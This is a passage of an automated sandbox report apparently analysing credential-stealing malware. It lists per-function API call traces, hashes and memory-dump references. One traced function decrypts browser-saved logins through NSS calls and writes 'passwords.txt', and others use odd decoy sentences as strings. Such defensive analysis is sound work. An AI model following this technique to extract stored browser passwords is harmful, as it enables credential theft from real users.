                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E46B
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E47E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E48F
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E496
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4B1
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4B8
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4BF
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4C6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0), ref: 0040E4DB
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E4E2
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E4F5
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E506
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E50D
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E52F
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E536
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E53D
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E544
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E55C
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E563
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E576
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E587
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E58E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E19D: strlen.MSVCRT ref: 0040E1B4
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E597
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5A7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5AE
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E5DA
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E5FE
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E627
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E62E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E633
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E63E
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E645
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E656
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDA7FA0,00000000), ref: 0040E65D
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E66B
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E677
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E67E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E6A4
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E6AB
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E6B2
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040E6B9
                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040E6D1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E6E2
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E6E9
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040E737
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E77B
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E782
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strchr.MSVCRT ref: 0040E2AA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: lstrlenA.KERNEL32(?), ref: 0040E2C8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E2D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: HeapAlloc.KERNEL32(00000000), ref: 0040E2DC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E24B: strcpy_s.MSVCRT ref: 0040E317
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E7CE
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0040E7D5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2599614518-0
                                                                                                                                                                                                                                                                  • Opcode ID: b2b410e4117911ea0987c9f03c80ea1092ef309a952777d34adca9f9d3e75bda
                                                                                                                                                                                                                                                                  • Instruction ID: d9d6268398844ff67752c899a6c42ea79fae635aad79df2f3a4eca69292749a3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2b410e4117911ea0987c9f03c80ea1092ef309a952777d34adca9f9d3e75bda
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E135B1C0021AAFCF11AFE1CD899EFBB79BF09304F10182AF615B6191DB794A54CB65
                                                                                                                                                                                                                                                                  Function 0041742B Relevance: 89.4, APIs: 42, Strings: 9, Instructions: 170libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00417481
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041744E
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041742B
                                                                                                                                                                                                                                                                  • kernel32.dll, xrefs: 00417441
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 00417477
                                                                                                                                                                                                                                                                  • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041749E
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041745D
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00417435
                                                                                                                                                                                                                                                                  • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 004174AD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$wcslen$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 3854642915-1522344851
                                                                                                                                                                                                                                                                  • Opcode ID: 4eba9e446e52d6073f555b3b86fb404c978fed4c802a542cc29d9714122e7a4b
                                                                                                                                                                                                                                                                  • Instruction ID: ad93c572eefa7165a372745686be9ef41ca24fd1b9ca20db8f61415a605ff2a5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eba9e446e52d6073f555b3b86fb404c978fed4c802a542cc29d9714122e7a4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3815D7D514280EFEB526FA0FD18A653FB3F70BB81714602AEA058A234DB3544D4EF54
                                                                                                                                                                                                                                                                  Function 0040842F Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 258stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00408434
                                                                                                                                                                                                                                                                  • NSS_Init.NSS3(00000000,?,00000000,?), ref: 00408451
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00408534
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040853C
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408548
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00408552
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408563
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040856F
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00408576
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?), ref: 00408588
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000010), ref: 004085A2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 004085B6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004085C8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA0), ref: 004085D6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004085E8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA4), ref: 004085F6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 00408605
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,-00000010), ref: 0040860F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DA8), ref: 0040861D
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: memset.MSVCRT ref: 00408358
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrlenA.KERNEL32(0040865D,00000001,?,00000014,00000000,00000000,?,0040865D,00000014), ref: 00408372
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: CryptStringToBinaryA.CRYPT32(0040865D,00000000,?,0040865D,00000014), ref: 0040837C
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_GetInternalKeySlot.NSS3(?,0040865D,00000014), ref: 0040838A
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040865D,00000014), ref: 0040839F
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 004083CA
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: memcpy.MSVCRT ref: 004083E4
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: PK11_FreeSlot.NSS3(?), ref: 00408414
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DAC), ref: 00408670
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 00408680
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014), ref: 00408690
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 004086A4
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrcat.KERNEL32(00425BDF,00425BE3), ref: 0040840B
                                                                                                                                                                                                                                                                    • Part of subcall function 00408331: lstrcat.KERNEL32(00425BDF,00425BE6), ref: 00408423
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 004086B5
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DB0), ref: 004086C3
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DB4), ref: 004086D1
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE), ref: 004086E1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004086F7
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408753
                                                                                                                                                                                                                                                                  • NSS_Shutdown.NSS3 ref: 00408759
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                  • API String ID: 2888107993-347816968
                                                                                                                                                                                                                                                                  • Opcode ID: 539ef243f2ae8c3d081cd64f341def717f986a1dbbf517a3e5e3c92da4f77b3f
                                                                                                                                                                                                                                                                  • Instruction ID: 9bc58490b6cb9bbaf61b34de7f0c058facaa2db03e444b3a35631fabe54f0609
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 539ef243f2ae8c3d081cd64f341def717f986a1dbbf517a3e5e3c92da4f77b3f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA17E75800119EFDB11EBA0DD49EEEBF7AFF1A314F14142AF611B21A1DB381A48CB65
                                                                                                                                                                                                                                                                  Function 6C901D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C901DA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C901DB2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                                                                                                                                    • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C901DD8
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C901E4F
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C901EA4
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C901ECD
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C901EEF
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C901F17
                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C901F34
                                                                                                                                                                                                                                                                  • PR_SetLogBuffering.NSS3(00004000), ref: 6C901F61
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C901F6E
                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C901F83
                                                                                                                                                                                                                                                                  • PR_SetLogFile.NSS3(00000000), ref: 6C901FA2
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C901FB8
                                                                                                                                                                                                                                                                  • OutputDebugStringA.KERNEL32(00000000), ref: 6C901FCB
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C901FD2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                                  • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                                  • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                                  • Opcode ID: 0b8924eb05de9d6ef3b2b223e5eb036d270f53faed9fdfec0d6fd153681e3e0d
                                                                                                                                                                                                                                                                  • Instruction ID: b5e05061e2ffababa25bab56d6cab8227d3522790b9be6b3710451a53fdbf621
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b8924eb05de9d6ef3b2b223e5eb036d270f53faed9fdfec0d6fd153681e3e0d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C518DB1E002599FDF00DBE5CD44BAE77B8AF0234CF084529EA19DBA00E774D599CBA1
                                                                                                                                                                                                                                                                  Function 6C974C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C50
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C5B
                                                                                                                                                                                                                                                                  • PR_smprintf.NSS3(6CA4AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974C76
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C964F51,00000000), ref: 6C974CAE
